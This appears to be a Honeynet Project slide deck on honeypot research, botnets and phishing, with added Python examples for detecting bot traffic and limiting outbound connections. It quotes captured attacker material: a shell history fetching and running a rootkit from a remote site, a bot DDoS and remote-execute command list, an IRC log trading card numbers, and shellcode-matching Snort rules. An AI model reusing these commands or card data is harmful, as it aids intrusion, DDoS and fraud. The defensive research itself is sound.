Honeynets and The Honeynet Project - PowerPoint PPT Presentation

1
Honeynets and The Honeynet Project
2
Speaker
3
Purpose
  • To explain our organization, our value to you,
    and our research.

4
Agenda
  • The Honeynet Project and Research Alliance
  • The Threat
  • How Honeynets Work
  • Learning More

5
Honeynet Project
6
Problem
  • How can we defend against an enemy when we don't
    even know who the enemy is?

7
Mission Statement
  • To learn the tools, tactics, and motives
    involved in computer and network attacks, and
    share the lessons learned.

8
Our Goal
  • Improve the security of the Internet at no cost to
    the public.
  • Awareness: raise awareness of the threats that
    exist.
  • Information: for those already aware, we teach
    and inform about the threats.
  • Research: we give organizations the capabilities
    to learn more on their own.

9
Honeynet Project
  • Non-profit (501c3) organization with Board of
    Directors.
  • Funded by sponsors
  • Global set of diverse skills and experiences.
  • Open Source, share all of our research and
    findings at no cost to the public.
  • Deploy networks around the world to be hacked.
  • Everything we capture is happening in the wild.
  • We have nothing to sell.

10
Honeynet Research Alliance
  • Starting in 2002, the Alliance is a forum of
    organizations around the world actively
    researching, sharing and deploying honeypot
    technologies.
  • http://www.honeynet.org/alliance/

11
Alliance Members
  • South Florida Honeynet Project
  • Georgia Technical Institute
  • Azusa Pacific University
  • USMA Honeynet Project
  • Pakistan Honeynet Project
  • Paladion Networks Honeynet Project (India)
  • Internet Systematics Lab Honeynet Project
    (Greece)
  • Honeynet.BR (Brazil)
  • UK Honeynet
  • French Honeynet Project
  • Italian Honeynet Project
  • Portugal Honeynet Project
  • German Honeynet Project
  • Spanish Honeynet Project
  • Singapore Honeynet Project
  • China Honeynet Project

12
The Threat
13
What we have captured
  • The Honeynet Project has captured primarily
    external threats that focus on targets of
    opportunity.
  • Little has been captured so far on advanced
    threats; few honeynets to date have been designed
    to capture them.

14
The Threat
  • Hundreds of scans a day.
  • Fastest manual compromise of a honeypot: 15
    minutes (by a worm: under 60 seconds).
  • Life expectancy of a vulnerable Win32 system is
    under three hours; of a vulnerable Linux system,
    three months.
  • Primarily cyber-crime, focused on Win32 systems and
    their users.
  • Attackers can control thousands of systems
    (botnets).

15
The Threat
16
The Motive
  • Motives vary, but we are seeing more and more
    that are criminally motivated.
  • Several years ago, hackers hacked computers.
    Now, criminals hack computers.
  • Fraud, extortion and identity theft have been
    around for centuries; the net just makes them
    easier.

17
DDoS for Money
J4ck: why don't you start charging for packet attacks?
J4ck: "give me x amount and I'll take bla bla offline for this amount of time"
J1LL: it was illegal last I checked
J4ck: heh, then everything you do is illegal. Why not make money off of it?
J4ck: I know plenty of people that'd pay exorbitant amounts for packeting
18
The Target
  • The mass of ordinary users.
  • Tend to be non-security aware, making them easy
    targets.
  • Economies of scale (it's a global target).

19
Interesting Trends
  • Attacks often originate from economically
    depressed countries (Romania is an example).
  • Attacks shifting from the computer to the user
    (computers getting harder to hack).
  • Attackers continue to get more sophisticated.

20
The Tools
  • Attacks used to be primarily worms and
    autorooters.
  • New advances include Botnets and Phishing.
  • Tools are constantly advancing.

21
The Old Days
Jan 8 18:48:12 HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR
Jan 8 18:48:31 HISTORY: PID=1246 UID=0 y
Jan 8 18:48:45 HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR
Jan 8 18:48:59 HISTORY: PID=1246 UID=0 tar -xzvf Lu
Jan 8 18:49:01 HISTORY: PID=1246 UID=0 tar -xzvf L
Jan 8 18:49:03 HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR
Jan 8 18:49:06 HISTORY: PID=1246 UID=0 cd luckroot
Jan 8 18:49:13 HISTORY: PID=1246 UID=0 ./luckgo 216 210
Jan 8 18:51:07 HISTORY: PID=1246 UID=0 ./luckgo 200 120
Jan 8 18:51:43 HISTORY: PID=1246 UID=0 ./luckgo 64 120
Jan 8 18:52:00 HISTORY: PID=1246 UID=0 ./luckgo 216 200
22
Botnets
  • Large networks of hacked systems.
  • Often thousands, if not tens of thousands, of
    hacked systems under the control of a single
    user.
  • Automated commands used to control the zombies.

23
How They Work
  • After successful exploitation, a bot uses TFTP,
    FTP, or HTTP to download itself to the
    compromised host.
  • The binary is started and connects to the
    hard-coded master IRC server.
  • Often a dynamic DNS name is provided rather than
    a hard-coded IP address, so the bot can be easily
    relocated.
  • Using a specially crafted nickname like USA743634,
    the bot joins the master's channel, sometimes
    using a password to keep strangers out of the
    channel.

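
The join pattern described above (a country-code-plus-digits nickname joining a keyed channel from several hosts) is something a honeywall analyst can look for in reconstructed IRC commands. The block below is an added example, not code from the deck or from any Honeynet Project tool; the IRC lines, hosts, nicknames and channel are constructed.

```python
import re
from collections import defaultdict

# Constructed sample of client->server IRC commands, one per line, prefixed
# with the honeypot that sent them (not real captured traffic).
SAMPLE_IRC = """\
10.0.0.5 NICK USA743634
10.0.0.5 USER sys 0 * :sys
10.0.0.5 JOIN #b0tz s3cretkey
10.0.0.9 NICK DEU118829
10.0.0.9 USER x 0 * :x
10.0.0.9 JOIN #b0tz s3cretkey
10.0.0.12 NICK alice_
10.0.0.12 USER alice 0 * :Alice
10.0.0.12 JOIN #linux
"""

# Two or three capital letters followed by a long run of digits, e.g. USA743634.
BOT_NICK = re.compile(r"^[A-Z]{2,3}\d{5,}$")

def parse_irc(text):
    """Yield (src, command, args) tuples from 'src COMMAND args...' lines."""
    for line in text.splitlines():
        parts = line.split(None, 2)
        if len(parts) < 2:
            continue
        src, cmd = parts[0], parts[1].upper()
        args = parts[2].split() if len(parts) > 2 else []
        yield src, cmd, args

def find_bot_joins(text, min_hosts=2):
    """Return {channel: [src, ...]} for channels that at least `min_hosts`
    hosts using bot-style nicknames joined with the same channel key."""
    nick_of = {}                        # src -> last NICK seen
    joins = defaultdict(list)           # (channel, key) -> [src, ...]
    for src, cmd, args in parse_irc(text):
        if cmd == "NICK" and args:
            nick_of[src] = args[0]
        elif cmd == "JOIN" and len(args) >= 2:      # JOIN with a key
            if BOT_NICK.match(nick_of.get(src, "")):
                joins[(args[0], args[1])].append(src)
    return {chan: hosts for (chan, _key), hosts in joins.items()
            if len(hosts) >= min_hosts}

if __name__ == "__main__":
    for chan, hosts in find_bot_joins(SAMPLE_IRC).items():
        print(f"likely botnet channel {chan}: {', '.join(hosts)}")
```
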
24
80% of traffic
  • Port 445/TCP
  • Port 139/TCP
  • Port 135/TCP
  • Port 137/UDP
  • Infected systems most often WinXP-SP1 and Win2000

25
Bots
ddos.synflood [host] [time] [delay] [port]    starts a SYN flood
ddos.httpflood [url] [number] [referrer] [recursive = true|false]    starts a HTTP flood
scan.listnetranges    list scanned netranges
scan.start    starts all enabled scanners
scan.stop    stops all scanners
http.download    download a file via HTTP
http.execute    updates the bot via the given HTTP URL
http.update    executes a file from a given HTTP URL
cvar.set spam_aol_channel [channel]    AOL Spam - Channel name
cvar.set spam_aol_enabled [1/0]    AOL Spam - Enabled?
26
Numbers
  • Over a four-month period:
  • More than 100 botnets were tracked.
  • One channel had over 200,000 IP addresses.
  • One computer was compromised by 16 bots.
  • Estimate: over 1 million systems compromised.

27
Botnet Economy
  • Botnets sold or for rent.
  • Saw Botnets being stolen from each other.
  • Observed harvesting of information from all
    compromised machines. For example, the operator
    of the botnet can request a list of CD-keys (e.g.
    for Windows or games) from all bots. These
    CD-keys can be sold or used for other purposes
    since they are considered valuable information.

28
Phishing
  • Social engineer victims to give up valuable
    information (login, password, credit card number,
    etc).
  • Easier to hack the user than the computer.
  • Need attacks against instant messaging.
  • http://www.antiphishing.org

29
The Sting
30
Getting the Info
31
Infrastructure
  • Attackers build network of thousands of hacked
    systems (often botnets).
  • Upload pre-made pkgs for Phishing.
  • Use platforms for sending out spoofed email.
  • Use platforms for false websites.

32
A Phishing Rootkit
-rw-r--r--  1 free  web   14834 Jun 17 13:16 ebay only
-rw-r--r--  1 free  web  247127 Jun 14 19:58 emailer2.zip
-rw-r--r--  1 free  web    7517 Jun 11 11:53 html1.zip
-rw-r--r--  1 free  web   10383 Jul  3 19:07 index.html
-rw-r--r--  1 free  web     413 Jul 18 22:09 index.zip
-rw-r--r--  1 free  web  246920 Jun 14 20:38 massmail.tgz
-rw-r--r--  1 free  web    8192 Jun 12 07:18 massmail.zip
-rw-r--r--  1 free  web   12163 Jun  9 01:31 send.php
-rw-r--r--  1 free  web    2094 Jun 20 11:49 sendspamAOL1.tgz
-rw-r--r--  1 free  web    2173 Jun 14 22:58 sendspamBUN1.tgz
-rw-r--r--  1 free  web    2783 Jun 15 00:21 sendspamBUNzip1.zip
-rw-r--r--  1 free  web    2096 Jun 16 18:46 sendspamNEW1.tgz
-rw-r--r--  1 free  web    1574 Jul 11 01:08 sendbank1.tgz
-rw-r--r--  1 free  web    2238 Jul 18 23:07 sendbankNEW.tgz
-rw-r--r--  1 free  web   83862 Jun  9 09:56 spamz.zip
-rw-r--r--  1 free  web   36441 Jul 18 00:52 usNEW.zip
-rw-r--r--  1 free  web   36065 Jul 11 17:04 bank1.tgz
drwxr-xr-x  2 free  web      49 Jul 16 12:26 banka
-rw-r--r--  1 free  web  301939 Jun  8 13:17 www1.tar.gz

33
Credit Cards Exchanging
04:55:16 <COCO_JAA> !cc
04:55:23 <Chk> (COCO_JAA) CC for U: Bob Johns, P. O. Box 126, Wendel, CA 25631, United States, 510-863-4884, 4407070000588951 06/05 (All This ccs update everyday From My Hacked shopping Database - You must regular come here for got all this ccs) (TraDecS Chk_Bot FoR goldcard)
04:55:42 <COCO_JAA> !cclimit 4407070000588951
04:55:46 <Chk> (COCO_JAA) Limit for Ur MasterCard (5407070000788951) 0.881 (This Doesn't Mean Its Valid) (TraDecS Chk_bot FoR channel)
04:56:55 <COCO_JAA> !cardablesite
04:57:22 <COCO_JAA> !cardable electronics
04:57:27 <Chk> (COCO_JAA) Site where you can card electronics (TraDecS Chk_bot FoR goldcard)
04:58:09 <COCO_JAA> !cclimit 4234294391131136
04:58:12 <Chk> (COCO_JAA) Limit for Ur Visa (4264294291131136) 9.697 (This Doesn't Mean Its Valid) (TraDecS Chk_bot FoR channel)
34
The Future
  • Hacking is profitable, and it is difficult to get
    caught.
  • Expect more attacks to focus on the end user or
    the client.
  • Expect things to get worse, bad guys adapt faster.

35
Honeynets
36
Honeypots
  • A honeypot is an information system resource
    whose value lies in unauthorized or illicit use
    of that resource.
  • Has no production value, anything going to or
    from a honeypot is likely a probe, attack or
    compromise.
  • Primary value to most organizations is
    information.

37
Advantages
  • Collect small data sets of high value.
  • Reduce false positives.
  • Catch new attacks (reduce false negatives).
  • Work in encrypted or IPv6 environments.
  • Simple concept requiring minimal resources.

38
Disadvantages
  • Limited field of view (microscope)
  • Risk (mainly high-interaction honeypots)

39
Types
  • Low-interaction
    - Emulates services, applications, and OSs.
    - Low risk and easy to deploy/maintain, but
      captures limited information.
  • High-interaction
    - Real services, applications, and OSs.
    - Captures extensive information, but high risk
      and time intensive to maintain.

40
Examples of Honeypots
Low Interaction
  • BackOfficer Friendly
  • KFSensor
  • Honeyd

High Interaction
  • Honeynets

41
Honeynets
  • High-interaction honeypot designed to capture
    in-depth information.
  • Information has different value to different
    organizations.
  • It's an architecture you populate with live
    systems, not a product or software.
  • Any traffic entering or leaving is suspect.

42
How it works
  • A highly controlled network where every packet
    entering or leaving is monitored, captured, and
    analyzed.
  • Data Control
  • Data Capture
  • Data Analysis

http://www.honeynet.org/papers/honeynet/
43
Honeynet Architecture
44
Data Control
  • Mitigate risk of honeynet being used to harm
    non-honeynet systems.
  • Count outbound connections.
  • IPS (Snort-Inline)
  • Bandwidth Throttling

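
The "count outbound connections" control above can be modelled as a sliding-window limiter with a per-protocol hourly ceiling, in the spirit of the Honeywall's HwTCPRATE setting shown later in the deck. This is an added example, not the Honeywall's own code; the limit values and the connection events are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed per-protocol limits: outbound connections per honeypot per hour.
LIMITS = {"tcp": 30, "udp": 20, "icmp": 50}
WINDOW = timedelta(hours=1)

def control_outbound(events, limits=LIMITS, window=WINDOW):
    """events: iterable of (timestamp, honeypot_ip, proto, dst) in time order.
    Returns [(event, 'allow' | 'drop'), ...]. A connection is dropped once
    the honeypot has already opened limits[proto] connections of that
    protocol inside the trailing window; dropped ones are not counted, so
    the attacker cannot extend the block by retrying."""
    recent = defaultdict(list)          # (honeypot, proto) -> allowed timestamps
    decisions = []
    for ev in events:
        ts, hp, proto, _dst = ev
        key = (hp, proto)
        # Forget connections that have aged out of the sliding window.
        recent[key] = [t for t in recent[key] if ts - t < window]
        if len(recent[key]) < limits.get(proto, 0):
            recent[key].append(ts)
            decisions.append((ev, "allow"))
        else:
            decisions.append((ev, "drop"))
    return decisions

def make_sample():
    """Constructed sample: one honeypot bursting 35 TCP connections in about
    ten minutes (a scan or DDoS launch), plus a single UDP DNS lookup."""
    t0 = datetime(2005, 6, 1, 12, 0, 0)
    evs = [(t0 + timedelta(seconds=17 * i), "10.0.0.5", "tcp",
            "198.51.100.%d" % (i % 7)) for i in range(35)]
    evs.append((t0 + timedelta(minutes=9), "10.0.0.5", "udp", "10.0.0.1"))
    return sorted(evs)

def count(decisions, verdict):
    """Number of decisions with the given verdict."""
    return sum(1 for _ev, d in decisions if d == verdict)

if __name__ == "__main__":
    dec = control_outbound(make_sample())
    print(count(dec, "allow"), "allowed,", count(dec, "drop"), "dropped")
```
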
45
No Data Control
46
Data Control
47
Snort-Inline
alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named"; flags: A+; content:"|CD80 E8D7 FFFFFF|/bin/sh";)

alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named"; flags: A+; content:"|CD80 E8D7 FFFFFF|/bin/sh"; replace:"|0000 E8D7 FFFFFF|/ben/sh";)
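
The second rule above does not drop the packet; it rewrites the matched bytes in place so the exploit fails while the attacker sees nothing unusual. The block below is an added example, not Snort or Honeynet Project code: it parses Snort's content/replace syntax (text outside |...| is literal, inside is hex) and applies the rewrite to a constructed payload, enforcing the same-length rule that replace needs so the TCP stream stays consistent.

```python
import re

def snort_content(spec):
    """Convert a Snort content string such as '|CD80 E8D7 FFFFFF|/bin/sh'
    into the raw bytes it matches."""
    out = bytearray()
    for i, part in enumerate(spec.split("|")):
        if i % 2:                      # inside pipes: hex digits, spaces ignored
            out += bytes.fromhex(part.replace(" ", ""))
        else:                          # outside pipes: literal text
            out += part.encode("latin-1")
    return bytes(out)

def parse_rule(rule):
    """Pull the content and replace options out of a single-line rule."""
    opts = dict(re.findall(r'(content|replace)\s*:\s*"([^"]*)"', rule))
    return snort_content(opts["content"]), snort_content(opts.get("replace", ""))

def apply_replace(rule, payload):
    """Return (matched, new_payload). The replacement must be exactly as
    long as the content so sequence numbers and checksums still line up."""
    content, replacement = parse_rule(rule)
    if replacement and len(replacement) != len(content):
        raise ValueError("replace must be the same length as content")
    if content not in payload:
        return False, payload
    return True, payload.replace(content, replacement or content)

RULE = ('alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named"; '
        'flags: A+; content:"|CD80 E8D7 FFFFFF|/bin/sh"; '
        'replace:"|0000 E8D7 FFFFFF|/ben/sh";)')

# Constructed payload that merely contains the matched byte sequence.
SAMPLE = b"AAAA" + bytes.fromhex("cd80e8d7ffffff") + b"/bin/sh\x00BBBB"

if __name__ == "__main__":
    hit, out = apply_replace(RULE, SAMPLE)
    print(hit, out)
```
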
48
Data Capture
  • Capture all activity at a variety of levels.
  • Network activity.
  • Application activity.
  • System activity.

49
Sebek
  • Hidden kernel module that captures all host
    activity.
  • Dumps activity to the network.
  • Hides its own packets from the attacker, which it
    recognizes by a magic number and destination
    port, so the attacker cannot sniff them.

50
Sebek Architecture
51
Honeywall CDROM
  • Attempt to combine all requirements of a
    Honeywall onto a single, bootable CDROM.
  • May, 2003 - Released Eeyore
  • May, 2005 - Released Roo

52
Eeyore Problems
  • OS too minimized, almost crippled. Could not
    easily add functionality.
  • Difficult to modify since LiveCD.
  • Limited distributed capabilities
  • No GUI administration
  • No Data Analysis
  • No international or SCSI support

53
Roo Honeywall CDROM
  • Based on Fedora Core 3
  • Vastly improved hardware and international
    support.
  • Automated, headless installation
  • New Walleye interface for web based
    administration and data analysis.
  • Automated system updating.

54
Installation
  • Just insert the CDROM and boot; it installs to the
    local hard drive.
  • After it reboots for the first time, it runs a
    hardening script based on NIST and CIS security
    standards.
  • Following installation, you get a command prompt
    and the system is ready to configure.

55
First Boot
56
Install
57
Configure
58
3 Methods to Maintain
  • Command Line Interface
  • Dialog Interface
  • Web GUI (Walleye)

59
Command Line Interface
  • Local or SSH access only.
  • Use the utility hwctl to modify configurations
    and restart services.
  • hwctl HwTCPRATE=30

60
Dialog Menu
61
Data Administration
62
Data Analysis
  • The most critical part: the purpose of a honeynet
    is to gather information and learn.
  • Need a method to analyze all the different
    elements of information.
  • Walleye is the new solution, comes with the CDROM.

63
Walleye
64
Data Analysis
65
Data Analysis Flows
66
Data Analysis Details
67
Processes
68
Files
69
Distributed Capabilities
70
Issues
  • Require extensive resources to properly maintain.
  • Detection and anti-honeynet technologies have
    been introduced.
  • Can be used to attack or harm other non-Honeynet
    systems.
  • Privacy can be a potential issue.

71
Legal Contact for .mil / .gov
  • Department of Justice Computer Crime and
    Intellectual Property Section.
  • Paul Ohm
  • Number: (202) 514.1026
  • E-Mail: paul.ohm@usdoj.gov

72
Learning More
73
Our Website
  • Know Your Enemy papers.
  • Scan of the Month Challenges
  • Latest Tools and Technologies
  • http://www.honeynet.org/

74
Our Book
http://www.honeynet.org/book
75
Sponsoring
Advanced Network Management Lab
YOU?
76
How to Sponsor
  • Sponsor development of a new tool
  • Sponsor authorship of a new research paper.
  • Sponsor research and development.
  • Buy our book

<project@honeynet.org> http://www.honeynet.org/funds/
77
Conclusion
  • The Honeynet Project is a non-profit, research
    organization improving the security of the
    Internet at no cost to the public by providing
    tools and information on cyber security threats.

78
  • http://www.honeynet.org
  • <project@honeynet.org>